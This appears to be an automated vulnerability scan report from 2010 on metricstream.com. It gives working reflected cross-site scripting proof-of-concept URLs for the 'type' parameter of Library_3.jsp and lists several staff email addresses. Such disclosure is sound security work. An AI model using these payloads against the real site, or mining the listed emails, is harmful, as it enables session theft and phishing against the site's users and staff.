Report generated by XSS.CX at Tue Nov 16 17:25:03 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://metricstream.com/library/Library_3.jsp [type parameter]

1.2. http://metricstream.com/library/Library_3.jsp [type parameter]

1.3. http://metricstream.com/library/Library_3.jsp [type parameter]

2. Cookie without HttpOnly flag set

2.1. http://metricstream.com/library/Library_3.jsp

2.2. http://metricstream.com/library/index.jsp

3. Cross-domain Referer leakage

4. Cross-domain script include

4.1. http://metricstream.com/library/Library_3.jsp

4.2. http://metricstream.com/library/index.jsp

4.3. http://metricstream.com/pressNews/analyst_reports/forrester_wave_09.htm

5. Email addresses disclosed

5.1. http://metricstream.com/company/contactinfo.htm

5.2. http://metricstream.com/js/functions_newweb.js

5.3. http://metricstream.com/js/functions_web.js

5.4. http://metricstream.com/js/menu.js

5.5. http://metricstream.com/library/functions_web.js

5.6. http://metricstream.com/library/menu.js

5.7. http://metricstream.com/partners/nasdaq_reg.htm

5.8. http://metricstream.com/pressNews/pr_210_aei_erm_solution.htm

5.9. http://metricstream.com/pressNews/pr_219_suntrust_selects_metricstream_enterprise_wide_grc.htm

5.10. http://metricstream.com/pressNews/pr_225_societe_generale_compliance_risk_assessment.htm

5.11. http://metricstream.com/pressNews/pr_229_federal_home_loan_bank_compliance_solutions.htm

5.12. http://metricstream.com/pressNews/pr_235_PRA_regulatory_compliance_quality_management.htm

5.13. http://metricstream.com/pressNews/pr_248_SIFMA_IAS_annual_conference_2010.htm

5.14. http://metricstream.com/pressNews/pr_250_RAPS_Annual_Conference_Exhibition_2010.htm

5.15. http://metricstream.com/pressNews/pressrelease.htm

6. Content type incorrectly stated

6.1. http://metricstream.com/js/functions_newweb.js

6.2. http://metricstream.com/js/functions_web.js

6.3. http://metricstream.com/library/dwr/interface/browseBy.js

6.4. http://metricstream.com/library/functions_web.js

7. Content type is not specified



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://metricstream.com/library/Library_3.jsp [type parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62995"%3balert(1)//c572430476c was submitted in the type parameter. This input was echoed as 62995";alert(1)//c572430476c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//c572430476c HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=657EBA6BC0A2993B961C875A4E4C0453; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:20:46 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>Case Studies62995";ale
...[SNIP]...
<strong>Browse Case Studies62995";alert(1)//c572430476c by:</strong>
...[SNIP]...

1.2. http://metricstream.com/library/Library_3.jsp [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload a4750<script>alert(1)</script>99973bf03fa was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /library/Library_3.jsp?type=Case%20Studiesa4750<script>alert(1)</script>99973bf03fa HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1D44175AEF679CC2528AEF892604020B; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:20:47 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>Case Studiesa4750<scri
...[SNIP]...
<strong>Browse Case Studiesa4750<script>alert(1)</script>99973bf03fa by:</strong>
...[SNIP]...

1.3. http://metricstream.com/library/Library_3.jsp [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The value of the type request parameter is copied into the HTML document as text between TITLE tags. The payload 3f58e</title><script>alert(1)</script>9e9125aed79 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /library/Library_3.jsp?type=Case%20Studies3f58e</title><script>alert(1)</script>9e9125aed79 HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C26704004AF2FD0F1865EDEAC3EB23C9; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:20:47 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>Case Studies3f58e</title><script>alert(1)</script>9e9125aed79 - Library - MetricStream</title>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://metricstream.com/library/Library_3.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /library/Library_3.jsp HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=631B69F6E03DEBE0DF680261EE4A7A24; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>null - Library - Metri
...[SNIP]...

2.2. http://metricstream.com/library/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://metricstream.com
Path:   /library/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /library/index.jsp HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A67DD517D550CC275BD3A5D54066FAE4; Path=/library
Content-Type: text/html
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /library/Library_3.jsp?type=Case%20Studies HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8482F7E3E524596E6190EA33EB1C907C; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>Case Studies - Library
...[SNIP]...
</script>
<script language="javascript" src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://metricstream.com/library/Library_3.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/Library_3.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /library/Library_3.jsp?type=Case%20Studies HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8482F7E3E524596E6190EA33EB1C907C; Path=/library
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>


<html>
<head>
<title>Case Studies - Library
...[SNIP]...
</script>
<script language="javascript" src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

4.2. http://metricstream.com/library/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /library/index.jsp HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A67DD517D550CC275BD3A5D54066FAE4; Path=/library
Content-Type: text/html
Date: Wed, 17 Nov 2010 00:19:36 GMT
Connection: close

<script type='text/javascript' src='/library/dwr/interface/browseBy.js'></script>
<script type='text/javascript' src='/library/dwr/engine.js'></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
...[SNIP]...
</script>
<script language="javascript" src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

4.3. http://metricstream.com/pressNews/analyst_reports/forrester_wave_09.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /pressNews/analyst_reports/forrester_wave_09.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pressNews/analyst_reports/forrester_wave_09.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"31381-1253257584000"
Last-Modified: Fri, 18 Sep 2009 07:06:24 GMT
Content-Type: text/html
Content-Length: 31381
Date: Wed, 17 Nov 2010 00:18:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Forrester Research, Inc. Names MetricStream as a leader in the independent report for Enterprise Governance, Risk,
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

5. Email addresses disclosed  previous  next
There are 15 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://metricstream.com/company/contactinfo.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /company/contactinfo.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company/contactinfo.htm HTTP/1.1
Accept: */*
Referer: http://metricstream.com/library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//HOYT.LLC.XSS.PoC.11.16.2010.METRICSTREAM.COM
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); channel=metricstream_website; mainbanner_num=8; __utmc=216666762

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"21871-1283455536000"
Last-Modified: Thu, 02 Sep 2010 19:25:36 GMT
Content-Type: text/html
Content-Length: 21871
Date: Wed, 17 Nov 2010 00:22:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact - MetricStream</title>
<meta name="Description" content="Contact - The MetricStream Headquarters are locate
...[SNIP]...
<a href="mailto:info@metricstream.com" class="gray_link1">info@metricstream.com</a>
...[SNIP]...
<a href="mailto:shankar@metricstream.com" class="gray_link1">shankar@metricstream.com</a>
...[SNIP]...
<a href="mailto:santu@metricstream.com" class="gray_link1">santu@metricstream.com</a>
...[SNIP]...
<a href="mailto:agahlot@metricstream.com" class="gray_link1">agahlot@metricstream.com</a>
...[SNIP]...

5.2. http://metricstream.com/js/functions_newweb.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /js/functions_newweb.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/functions_newweb.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"70716-1276865496000"
Last-Modified: Fri, 18 Jun 2010 12:51:36 GMT
Content-Type: text/javascript
Content-Length: 70716
Date: Wed, 17 Nov 2010 00:18:26 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/spacer
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...

5.3. http://metricstream.com/js/functions_web.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /js/functions_web.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/functions_web.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/company/contactinfo.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); channel=metricstream_website; mainbanner_num=8; __utmc=216666762

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"114345-1289885492000"
Last-Modified: Tue, 16 Nov 2010 05:31:32 GMT
Content-Type: text/javascript
Content-Length: 114345
Date: Wed, 17 Nov 2010 00:22:28 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/spac
...[SNIP]...
<a href=\"mailto:info@metricstream.com?subject=Information Request\" style=\"color:#2A568F;font-family: Verdana, Arial, Helvetica, sans-serif;text-decoration: none; font-size:12px;\">
...[SNIP]...
<a href=\"mailto:info@metricstream.com?subject=Information Request\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...

5.4. http://metricstream.com/js/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /js/menu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/menu.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"23628-1148471974000"
Last-Modified: Wed, 24 May 2006 11:59:34 GMT
Content-Type: text/javascript
Content-Length: 23628
Date: Wed, 17 Nov 2010 00:18:26 GMT

/************************************************************************************
   (c) Ger Versluis 2000 version 5.5 24 December 2001 (updated Jan 31st, 2003 by Dynamic Drive for Opera7)
   Updated 19 July, 2003 by GV for CSS CompatMode    
   HV Menu found on Dynamic Drive ONLY may be used on both commercial and non commerical sites    
   For info write to menus@burmees.nl                            
   This script featured on Dynamic Drive DHTML code library: http://www.dynamicdrive.com
*************************************************************************************/
   var Agn
...[SNIP]...

5.5. http://metricstream.com/library/functions_web.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/functions_web.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/functions_web.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//c572430476c
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=ABC6877CE14E836EC928884C2622C9CA; channel=metricstream_website; mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmc=216666762; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"110680-1265881895000"
Last-Modified: Thu, 11 Feb 2010 09:51:35 GMT
Content-Type: text/javascript
Content-Length: 110680
Date: Wed, 17 Nov 2010 00:21:54 GMT

/*top_header = "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"983\" align=\"center\" bgcolor=\"#FFFFFF\">"+
   "<tr>"+
       "<td width=\"5\" class=\"left_border\"><img src=\"images/space
...[SNIP]...
<a href=\"mailto:info@metricstream.com?subject=Information Request\" style=\"color:#2A568F;font-family: Verdana, Arial, Helvetica, sans-serif;text-decoration: none; font-size:12px;\">
...[SNIP]...
<a href=\"mailto:info@metricstream.com?subject=Information Request\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...
<a href=\"mailto:info@metricstream.com\">info@metricstream.com</a>
...[SNIP]...

5.6. http://metricstream.com/library/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /library/menu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/menu.js HTTP/1.1
Accept: */*
Referer: http://metricstream.com/library/Library_3.jsp?type=Case%20Studies62995"%3balert(1)//c572430476c
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: metricstream.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=ABC6877CE14E836EC928884C2622C9CA; channel=metricstream_website; mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmb=216666762.3.10.1289948863; __utmc=216666762; __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"23628-1218541432000"
Last-Modified: Tue, 12 Aug 2008 11:43:52 GMT
Content-Type: text/javascript
Content-Length: 23628
Date: Wed, 17 Nov 2010 00:21:17 GMT

/************************************************************************************
   (c) Ger Versluis 2000 version 5.5 24 December 2001 (updated Jan 31st, 2003 by Dynamic Drive for Opera7)
   Updated 19 July, 2003 by GV for CSS CompatMode    
   HV Menu found on Dynamic Drive ONLY may be used on both commercial and non commerical sites    
   For info write to menus@burmees.nl                            
   This script featured on Dynamic Drive DHTML code library: http://www.dynamicdrive.com
*************************************************************************************/
   var Agn
...[SNIP]...

5.7. http://metricstream.com/partners/nasdaq_reg.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metricstream.com
Path:   /partners/nasdaq_reg.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /partners/nasdaq_reg.htm HTTP/1.1
Host: metricstream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=216666762.1289948863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mainbanner_num=6; __utma=216666762.114581433.1289948863.1289948863.1289948863.1; __utmc=216666762; __utmb=216666762.3.10.1289948863; channel=metricstream_website;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"27526-1231226332000"
Last-Modified: Tue, 06 Jan 2009 07:18:52 GMT
Content-Type: text/html
Content-Length: 27526
Date: Wed, 17 Nov 2010 00:20:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SOX Compliance for NASDAQ-Listed Companies - MetricStream</title>
